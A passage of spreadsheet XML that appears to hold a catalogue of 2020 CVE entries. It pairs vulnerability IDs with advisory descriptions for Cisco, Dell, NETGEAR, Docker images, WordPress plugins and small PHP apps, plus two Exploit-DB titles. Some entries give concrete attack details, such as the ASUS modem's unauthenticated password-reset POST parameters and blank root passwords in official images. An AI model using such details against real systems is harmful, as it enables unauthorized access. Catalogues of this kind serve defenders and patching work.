    <t>Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Observable Timing Discrepancy Vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35166</t>
  </si>
  <si>
    <t>CVE-2020-35167</t>
  </si>
  <si>
    <t>CVE-2020-35168</t>
  </si>
  <si>
    <t>CVE-2020-35169</t>
  </si>
  <si>
    <t>Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.5.2, contain an Improper Input Validation Vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3517</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Fabric Services component of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated attacker to cause process crashes, which could result in a denial of service (DoS) condition on an affected device. The attack vector is configuration dependent and could be remote or adjacent. For more information about the attack vector, see the Details section of this advisory. The vulnerability is due to insufficient error handling when the affected software parses Cisco Fabric Services messages. An attacker could exploit this vulnerability by sending malicious Cisco Fabric Services messages to an affected device. A successful exploit could allow the attacker to cause a reload of an affected device, which could result in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-35170</t>
  </si>
  <si>
    <t>Dell EMC Unisphere for PowerMax versions prior to 9.1.0.9, Dell EMC Unisphere for PowerMax versions prior to 9.0.2.16, and Dell EMC PowerMax OS 5978.221.221 and 5978.479.479 contain a Cross-Site Scripting (XSS) vulnerability. An authenticated malicious user may potentially exploit this vulnerability to inject javascript code and affect other authenticated users’ sessions.</t>
  </si>
  <si>
    <t>CVE-2020-35173</t>
  </si>
  <si>
    <t>The Amaze File Manager application before 3.4.2 for Android does not properly restrict intents for controlling the FTP server (aka services.ftpservice.FTPReceiver.ACTION_START_FTPSERVER and services.ftpservice.FTPReceiver.ACTION_STOP_FTPSERVER).</t>
  </si>
  <si>
    <t>CVE-2020-35175</t>
  </si>
  <si>
    <t>Frappe Framework 12 and 13 does not properly validate the HTTP method for the frappe.client API.</t>
  </si>
  <si>
    <t>CVE-2020-35176</t>
  </si>
  <si>
    <t>In AWStats through 7.8, cgi-bin/awstats.pl?config= accepts a partial absolute pathname (omitting the initial /etc), even though it was intended to only read a file in the /etc/awstats/awstats.conf format. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000501 and CVE-2020-29600.</t>
  </si>
  <si>
    <t>CVE-2020-35177</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise 1.4.1 and newer allowed the enumeration of users via the LDAP auth method. Fixed in 1.5.6 and 1.6.1.</t>
  </si>
  <si>
    <t>CVE-2020-3518</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of the affected software. The vulnerability exists because the web-based management interface does not properly validate user-supplied input.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20-35184</t>
  </si>
  <si>
    <t>The official composer docker images before 1.8.3 contain a blank password for a root user. System using the composer docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35185</t>
  </si>
  <si>
    <t>The official ghost docker images before 2.16.1-alpine (Alpine specific) contain a blank password for a root user. System using the ghost docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35186</t>
  </si>
  <si>
    <t>The official adminer docker images before 4.7.0-fastcgi contain a blank password for a root user. System using the adminer docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35187</t>
  </si>
  <si>
    <t>The official telegraf docker images before 1.9.4-alpine (Alpine specific) contain a blank password for a root user. System using the telegraf docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35189</t>
  </si>
  <si>
    <t>The official kong docker images before 1.0.2-alpine (Alpine specific) contain a blank password for a root user. System using the kong docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-3519</t>
  </si>
  <si>
    <t>A vulnerability in a specific REST API method of Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, remote attacker to conduct a path traversal attack on an affected device. The vulnerability is due to insufficient validation of user-supplied input to the API. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-35190</t>
  </si>
  <si>
    <t>The official plone Docker images before version of 4.3.18-alpine (Alpine specific) contain a blank password for a root user. System using the plone docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35191</t>
  </si>
  <si>
    <t>The official drupal docker images before 8.5.10-fpm-alpine (Alpine specific) contain a blank password for a root user. System using the drupal docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35192</t>
  </si>
  <si>
    <t>The official vault docker images before 0.11.6 contain a blank password for a root user. System using the vault docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35193</t>
  </si>
  <si>
    <t>The official sonarqube docker images before alpine (Alpine specific) contain a blank password for a root user. System using the sonarqube docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35195</t>
  </si>
  <si>
    <t>The official haproxy docker images before 1.8.18-alpine (Alpine specific) contain a blank password for a root user. System using the haproxy docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35196</t>
  </si>
  <si>
    <t>The official rabbitmq docker images before 3.7.13-beta.1-management-alpine (Alpine specific) contain a blank password for a root user. System using the rabbitmq docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35197</t>
  </si>
  <si>
    <t>The official memcached docker images before 1.5.11-alpine (Alpine specific) contain a blank password for a root user. System using the memcached docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.</t>
  </si>
  <si>
    <t>CVE-2020-35198</t>
  </si>
  <si>
    <t>An issue was discovered in Wind River VxWorks 7. The memory allocator has a possible integer overflow in calculating a memory block's size to be allocated by calloc(). As a result, the actual memory allocated is smaller than the buffer size specified by the arguments, leading to memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-35199</t>
  </si>
  <si>
    <t>Ignite Realtime Openfire 4.6.0 has create-bookmark.jsp groupchatJID Stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-3520</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, local attacker to obtain confidential information from an affected device. The vulnerability is due to insufficient protection of confidential information on an affected device. An attacker at any privilege level could exploit this vulnerability by accessing local filesystems and extracting sensitive information from them. A successful exploit could allow the attacker to view sensitive data, which they could use to elevate their privilege.</t>
  </si>
  <si>
    <t>CVE-2020-35200</t>
  </si>
  <si>
    <t>Ignite Realtime Openfire 4.6.0 has plugins/clientcontrol/spark-form.jsp Reflective XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35201</t>
  </si>
  <si>
    <t>Ignite Realtime Openfire 4.6.0 has create-bookmark.jsp users Stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35202</t>
  </si>
  <si>
    <t>Ignite Realtime Openfire 4.6.0 has plugins/dbaccess/db-access.jsp sql Stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35203</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Web Compliance Manager in Quest Policy Authority version 8.1.2.200 allows attackers to inject malicious code into the browser via a specially crafted link to the initFile.jsp file via the msg parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35204</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority version 8.1.2.200 allows attackers to inject malicious code into the browser via a specially crafted link to the PolicyAuthority/Common/FolderControl.jsp file via the unqID parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35205</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Server Side Request Forgery (SSRF) in Web Compliance Manager in Quest Policy Authority version 8.1.2.200 allows attackers to scan internal ports and make outbound connections via the initFile.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35206</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Web Compliance Manager in Quest Policy Authority version 8.1.2.200 allows attackers to inject malicious code into the browser via a specially crafted link to the cConn.jsp file via the ur parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35207</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in the LogMein LastPass Password Manager (aka com.lastpass.ilastpass) app 4.8.11.2403 for iOS. The PIN authentication for unlocking can be bypassed by forcing the authentication result to be true through runtime manipulation. In other words, an attacker could authenticate with an arbitrary PIN. NOTE: the vendor has indicated that this is not an attack of interest within the context of their threat model, which excludes jailbroken devices.</t>
  </si>
  <si>
    <t>CVE-2020-35208</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in the LogMein LastPass Password Manager (aka com.lastpass.ilastpass) app 4.8.11.2403 for iOS. The password authentication for unlocking can be bypassed by forcing the authentication result to be true through runtime manipulation. In other words, an attacker could authenticate with an arbitrary password. NOTE: the vendor has indicated that this is not an attack of interest within the context of their threat model, which excludes jailbroken devices.</t>
  </si>
  <si>
    <t>CVE-2020-35209</t>
  </si>
  <si>
    <t>An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.</t>
  </si>
  <si>
    <t>CVE-2020-3521</t>
  </si>
  <si>
    <t>A vulnerability in a specific REST API of Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. The vulnerability is due to insufficient validation of user-supplied input to the API. An attacker with a low-privileged account could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to read arbitrary files on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-35210</t>
  </si>
  <si>
    <t>A vulnerability in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via a Raft session flooding attack using Raft OpenSessionRequest messages.</t>
  </si>
  <si>
    <t>CVE-2020-35211</t>
  </si>
  <si>
    <t>An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node in a target cluster via manipulation of the variable terms in RaftContext.</t>
  </si>
  <si>
    <t>CVE-2020-35213</t>
  </si>
  <si>
    <t>An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.</t>
  </si>
  <si>
    <t>CVE-2020-35214</t>
  </si>
  <si>
    <t>An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.</t>
  </si>
  <si>
    <t>CVE-2020-35215</t>
  </si>
  <si>
    <t>An issue in Atomix v3.1.5 allows attackers to access sensitive information when a malicious Atomix node queries distributed variable primitives which contain the entire primitive lists that ONOS nodes use to share important states.</t>
  </si>
  <si>
    <t>CVE-2020-35216</t>
  </si>
  <si>
    <t>An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false member down event messages.</t>
  </si>
  <si>
    <t>CVE-2020-35217</t>
  </si>
  <si>
    <t>Vert.x-Web framework v4.0 milestone 1-4 does not perform a correct CSRF verification. Instead of comparing the CSRF token in the request with the CSRF token in the cookie, it compares the CSRF token in the cookie against a CSRF token that is stored in the session. An attacker does not even need to provide a CSRF token in the request because the framework does not consider it. The cookies are automatically sent by the browser and the verification will always succeed, leading to a successful CSRF attack.</t>
  </si>
  <si>
    <t>CVE-2020-35219</t>
  </si>
  <si>
    <t>The ASUS DSL-N17U modem with firmware 1.1.0.2 allows attackers to access the admin interface by changing the admin password without authentication via a POST request to Advanced_System_Content.asp with the uiViewTools_username=admin&amp;uiViewTools_Password= and uiViewTools_PasswordConfirm= substrings.</t>
  </si>
  <si>
    <t>CVE-2020-3522</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, remote attacker to bypass authorization on an affected device and access sensitive information that is related to the device. The vulnerability exists because the affected software allows users to access resources that are intended for administrators only. An attacker could exploit this vulnerability by submitting a crafted URL to an affected device. A successful exploit could allow the attacker to add, delete, and edit certain network configurations in the same manner as a user with administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2020-35221</t>
  </si>
  <si>
    <t>The hashing algorithm implemented for NSDP password authentication on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices was found to be insecure, allowing attackers (with access to a network capture) to quickly generate multiple collisions to generate valid passwords, or infer some parts of the original.</t>
  </si>
  <si>
    <t>CVE-2020-35223</t>
  </si>
  <si>
    <t>The CSRF protection mechanism implemented in the web administration panel on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices could be bypassed by omitting the CSRF token parameter in HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2020-35224</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the NSDP protocol authentication method on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices allows remote unauthenticated attackers to force a device reboot.</t>
  </si>
  <si>
    <t>CVE-2020-35225</t>
  </si>
  <si>
    <t>The NSDP protocol implementation on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices was not properly validating the length of string parameters sent in write requests, potentially allowing denial of service attacks.</t>
  </si>
  <si>
    <t>CVE-2020-35226</t>
  </si>
  <si>
    <t>NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices allow unauthenticated users to modify the switch DHCP configuration by sending the corresponding write request command.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-35227</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the access control section on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices (in the administration web panel) allows an attacker to inject IP addresses into the whitelist via the checkedList parameter to the delete command.</t>
  </si>
  <si>
    <t>CVE-2020-35228</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the administration web panel on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices allows remote attackers to inject arbitrary web script or HTML via the language parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35229</t>
  </si>
  <si>
    <t>The authentication token required to execute NSDP write requests on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices is not properly invalidated and can be reused until a new token is generated, which allows attackers (with access to network traffic) to effectively gain administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3523</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-35230</t>
  </si>
  <si>
    <t>Multiple integer overflow parameters were found in the web administration panel on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices. Most of the integer parameters sent through the web server can be abused to cause a denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-35231</t>
  </si>
  <si>
    <t>The NSDP protocol implementation on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices was affected by an authentication issue that allows an attacker to bypass access controls and obtain full control of the device.</t>
  </si>
  <si>
    <t>CVE-2020-35233</t>
  </si>
  <si>
    <t>The TFTP server fails to handle multiple connections on NETGEAR JGS516PE/GS116Ev2 v2.6.0.43 devices, and allows external attackers to force device reboots by sending concurrent connections, aka a denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-35234</t>
  </si>
  <si>
    <t>The easy-wp-smtp plugin before 1.4.4 for WordPress allows Administrator account takeover, as exploited in the wild in December 2020. If an attacker can list the wp-content/plugins/easy-wp-smtp/ directory, then they can discover a log file (such as #############_debug_log.txt) that contains all password-reset links. The attacker can request a reset of the Administrator password and then use a link found there.</t>
  </si>
  <si>
    <t>CVE-2020-35235</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** vendor/elfinder/php/connector.minimal.php in the secure-file-manager plugin through 2.5 for WordPress loads elFinder code without proper access control. Thus, any authenticated user can run the elFinder upload command to achieve remote code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35236</t>
  </si>
  <si>
    <t>The GitLab Webhook Handler in amazee.io Lagoon before 1.12.3 has incorrect access control associated with project deletion.</t>
  </si>
  <si>
    <t>CVE-2020-35239</t>
  </si>
  <si>
    <t>A vulnerability exists in CakePHP versions 4.0.x through 4.1.3. The CsrfProtectionMiddleware component allows method override parameters to bypass CSRF checks by changing the HTTP request method to an arbitrary string that is not in the list of request methods that CakePHP checks. Additionally, the route middleware does not verify that this overriden method (which can be an arbitrary string) is actually an HTTP method.</t>
  </si>
  <si>
    <t>CVE-2020-3524</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco IOS XE ROM Monitor (ROMMON) Software for Cisco 4000 Series Integrated Services Routers, Cisco ASR 920 Series Aggregation Services Routers, Cisco ASR 1000 Series Aggregation Services Routers, and Cisco cBR-8 Converged Broadband Routers could allow an unauthenticated, physical attacker to break the chain of trust and load a compromised software image on an affected device. The vulnerability is due to the presence of a debugging configuration option in the affected software. An attacker could exploit this vulnerability by connecting to an affected device through the console, forcing the device into ROMMON mode, and writing a malicious pattern using that specific option on the device. A successful exploit could allow the attacker to break the chain of trust and load a compromised software image on the affected device. A compromised software image is any software image that has not been digitally signed by Cisco.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48826.txt</t>
  </si>
  <si>
    <t>Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-35240</t>
  </si>
  <si>
    <t>FluxBB 1.5.11 is affected by cross-site scripting (XSS in the Blog Content component. This vulnerability can allow an attacker to inject the XSS payload in "Blog Content" and each time any user will visit the blog, the XSS triggers and the attacker can able to steal the cookie according to the crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-35241</t>
  </si>
  <si>
    <t>FlatPress 1.0.3 is affected by cross-site scripting (XSS) in the Blog Content component. This vulnerability can allow an attacker to inject the XSS payload in Blog content via the admin panel. Each time any user will go to that blog page, the XSS triggers and the attacker can steal the cookie according to the crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-35242</t>
  </si>
  <si>
    <t>Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::updateUserTeamInfoInDbAndMemory.</t>
  </si>
  <si>
    <t>CVE-2020-35243</t>
  </si>
  <si>
    <t>Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::updateUserInfoInDb.</t>
  </si>
  <si>
    <t>CVE-2020-35244</t>
  </si>
  <si>
    <t>Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::addGroup.</t>
  </si>
  <si>
    <t>CVE-2020-35245</t>
  </si>
  <si>
    <t>Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::addUser.</t>
  </si>
  <si>
    <t>CVE-2020-35249</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in ElkarBackup 1.3.3, allows attackers to execute arbitrary code via the name parameter to the add client feature.</t>
  </si>
  <si>
    <t>CVE-2020-35252</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability via the 'Full Name' parameter in the User Registration section of User Registration &amp; Login System with Admin Panel 1.0.</t>
  </si>
  <si>
    <t>CVE-2020-3526</t>
  </si>
  <si>
    <t>A vulnerability in the Common Open Policy Service (COPS) engine of Cisco IOS XE Software on Cisco cBR-8 Converged Broadband Routers could allow an unauthenticated, remote attacker to crash a device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a malformed COPS message to the device. A successful exploit could allow the attacker to crash the device.</t>
  </si>
  <si>
    <t>CVE-2020-35261</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in sourcecodester Multi Restaurant Table Reservation System 1.0 via the Restaurant Name field to /dashboard/profile.php.</t>
  </si>
  <si>
    <t>CVE-2020-35262</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Digisol DG-HR3400 can be exploited via the NTP server name in Time and date module and "Keyword" in URL Filter.</t>
  </si>
  <si>
    <t>CVE-2020-35263</t>
  </si>
  <si>
    <t>EgavilanMedia User Registration &amp; Login System 1.0 is affected by SQL injection to the admin panel, which may allow arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-35269</t>
  </si>
  <si>
    <t>Nagios Core application version 4.2.4 is vulnerable to Site-Wide Cross-Site Request Forgery (CSRF) in many functions, like adding – deleting for hosts or servers.</t>
  </si>
  <si>
    <t>CVE-2020-3527</t>
  </si>
  <si>
    <t>A vulnerability in the Polaris kernel of Cisco Catalyst 9200 Series Switches could allow an unauthenticated, remote attacker to crash the device. The vulnerability is due to insufficient packet size validation. An attacker could exploit this vulnerability by sending jumbo frames or frames larger than the configured MTU size to the management interface of this device. A successful exploit could allow the attacker to crash the device fully before an automatic recovery.</t>
  </si>
  <si>
    <t>CVE-2020-35270</t>
  </si>
  <si>
    <t>Student Result Management System In PHP With Source Code is affected by SQL injection. An attacker can able to access of Admin Panel and manage every account of Result.</t>
  </si>
  <si>
    <t>CVE-2020-35271</t>
  </si>
  <si>
    <t>Employee Performance Evaluation System in PHP/MySQLi with Source Code 1.0 is affected by cross-site scripting (XSS) in the Employees, First Name and Last Name fields.</t>
  </si>
  <si>
    <t>CVE-2020-35272</t>
  </si>
  <si>
    <t>Employee Performance Evaluation System in PHP/MySQLi with Source Code 1.0 is affected by cross-site scripting (XSS) in the Admin Portal in the Task and Description fields.</t>
  </si>
  <si>
    <t>CVE-2020-35273</t>
  </si>
  <si>
    <t>EgavilanMedia User Registration &amp; Login System with Admin Panel 1.0 is affected by Cross Site Request Forgery (CSRF) to remotely gain privileges in the User Profile panel. An attacker can update any user's account.</t>
  </si>
  <si>
    <t>CVE-2020-35274</t>
  </si>
  <si>
    <t>DotCMS Add Template with admin panel 20.11 is affected by cross-site Scripting (XSS) to gain remote privileges. An attacker could compromise the security of a website or web application through a stored XSS attack and stealing cookies using XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35275</t>
  </si>
  <si>
    <t>Coastercms v5.8.18 is affected by cross-site Scripting (XSS). A user can steal a cookie and make the user redirect to any malicious website because it is trigged on the main home page of the product/application.</t>
  </si>
  <si>
    <t>CVE-2020-35276</t>
  </si>
  <si>
    <t>EgavilanMedia ECM Address Book 1.0 is affected by SQL injection. An attacker can bypass the Admin Login panel through SQLi and get Admin access and add or remove any user.</t>
  </si>
  <si>
    <t>CVE-2020-3528</t>
  </si>
  <si>
    <t>A vulnerability in the OSPF Version 2 (OSPFv2) implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to incomplete input validation when the affected software processes certain OSPFv2 packets with Link-Local Signaling (LLS) data. An attacker could exploit this vulnerability by sending a malformed OSPFv2 packet to an affected device. A successful exploit could allow the attacker to cause an affected device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-35284</t>
  </si>
  <si>
    <t>Flamingo (aka FlamingoIM) through 2020-09-29 allows ../ directory traversal because the only ostensibly unpredictable part of a file-transfer request is an MD5 computation; however, this computation occurs on the client side, and the computation details can be easily determined because the product's source code is available.</t>
  </si>
  <si>
    <t>CVE-2020-3529</t>
  </si>
  <si>
    <t>A vulnerability in the SSL VPN negotiation process for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to inefficient direct memory access (DMA) memory management during the negotiation phase of an SSL VPN connection. An attacker could exploit this vulnerability by sending a steady stream of crafted Datagram TLS (DTLS) traffic to an affected device. A successful exploit could allow the attacker to exhaust DMA memory on the device and cause a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-35296</t>
  </si>
  <si>
    <t>ThinkAdmin v6 has default administrator credentials, which allows attackers to gain unrestricted administratior dashboard access.</t>
  </si>
  <si>
    <t>CVE-2020-3530</t>
  </si>
  <si>
    <t>A vulnerability in task group assignment for a specific CLI command in Cisco IOS XR Software could allow an authenticated, local attacker to execute that command, even though administrative privileges should be required. The attacker must have valid credentials on the affected device. The vulnerability is due to incorrect mapping in the source code of task group assignments for a specific command. An attacker could exploit this vulnerability by issuing the command, which they should not be authorized to issue, on an affected device. A successful exploit could allow the attacker to invalidate the integrity of the disk and cause the device to restart. This vulnerability could allow a user with read permissions to issue a specific command that should require Administrator privileges.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-35305</t>
  </si>
  <si>
    <t>Cross site scripting (XSS) in gollum 5.0 to 5.1.2 via the filename parameter to the 'New Page' dialog.</t>
  </si>
  <si>
    <t>CVE-2020-35308</t>
  </si>
  <si>
    <t>CONQUEST DICOM SERVER before 1.5.0 has a code execution vulnerability which can be exploited by attackers to execute malicious code.</t>
  </si>
  <si>
    <t>CVE-2020-35309</t>
  </si>
  <si>
    <t>Bakeshop Online Ordering System in PHP/MySQLi 1.0 is affected by cross-site scripting (XSS) which allows remote attackers to inject an arbitrary web script or HTML in admin dashboard - "Categories".</t>
  </si>
  <si>
    <t>CVE-2020-3531</t>
  </si>
  <si>
    <t>A vulnerability in the REST API of Cisco IoT Field Network Director (FND) could allow an unauthenticated, remote attacker to access the back-end database of an affected system. The vulnerability exists because the affected software does not properly authenticate REST API calls. An attacker could exploit this vulnerability by obtaining a cross-site request forgery (CSRF) token and then using the token with REST API requests. A successful exploit could allow the attacker to access the back-end database of the affected device and read, alter, or drop information.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49154.py</t>
  </si>
  <si>
    <t>WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-35313</t>
  </si>
  <si>
    <t>A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.</t>
  </si>
  <si>
    <t>CVE-2020-35314</t>
  </si>
  <si>
    <t>A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.</t>
  </si>
  <si>
    <t>CVE-2020-35327</t>
  </si>
  <si>
    <t>SQL injection vulnerability was discovered in Courier Management System 1.0, which can be exploited via the ref_no (POST) parameter to admin_class.php</t>
  </si>
  <si>
    <t>CVE-2020-35328</t>
  </si>
  <si>
    <t>Courier Management System 1.0 - 'First Name' Stored XSS</t>
  </si>
  <si>
    <t>CVE-2020-35329</t>
  </si>
  <si>
    <t>Courier Management System 1.0 1.0 is affected by SQL Injection via 'MULTIPART street '.</t>
  </si>
  <si>
    <t>CVE-2020-3533</t>
  </si>
  <si>
    <t>A vulnerability in the Simple Network Management Protocol (SNMP) input packet processor of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly. The vulnerability is due to a lack of sufficient memory management protections under heavy SNMP polling loads. An attacker could exploit this vulnerability by sending a high rate of SNMP requests to the SNMP daemon through the management interface on an affected device. A successful exploit could allow the attacker to cause the SNMP daemon process to consume a large amount of system memory over time, which could then lead to an unexpected device restart, causing a denial of service (DoS) condition. This vulnerability affects all versions of SNMP.</t>
  </si>
  <si>
    <t>CVE-2020-35337</t>
  </si>
  <si>
    <t>ThinkSAAS before 3.38 contains a SQL injection vulnerability through app/topic/action/admin/topic.php via the title parameter, which allows remote attackers to execute arbitrary SQL commands.</t>
  </si>
  <si>
    <t>CVE-2020-35338</t>
  </si>
  <si>
    <t>The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of "pokon."</t>
  </si>
  <si>
    <t>CVE-2020-35339</t>
  </si>
  <si>
    <t>In 74cms version 5.0.1, there is a remote code execution vulnerability in /Application/Admin/Controller/ConfigController.class.php and /ThinkPHP/Common/functions.php where attackers can obtain server permissions and control the server.</t>
  </si>
  <si>
    <t>CVE-2020-35340</t>
  </si>
  <si>
    <t>A local file inclusion vulnerability in ExpertPDF 9.5.0 through 14.1.0 allows attackers to read the file contents from files that the running ExpertPDF process has access to read.</t>
  </si>
  <si>
    <t>CVE-2020-35346</t>
  </si>
  <si>
    <t>CXUUCMS V3 3.1 is affected by a reflected XSS vulnerability that allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of admin.php?c=content&amp;a=add.</t>
  </si>
  <si>
    <t>CVE-2020-35347</t>
  </si>
  <si>
    <t>CXUUCMS V3 3.1 has a CSRF vulnerability that can add an administrator account via admin.php?c=adminuser&amp;a=add.</t>
  </si>
  <si>
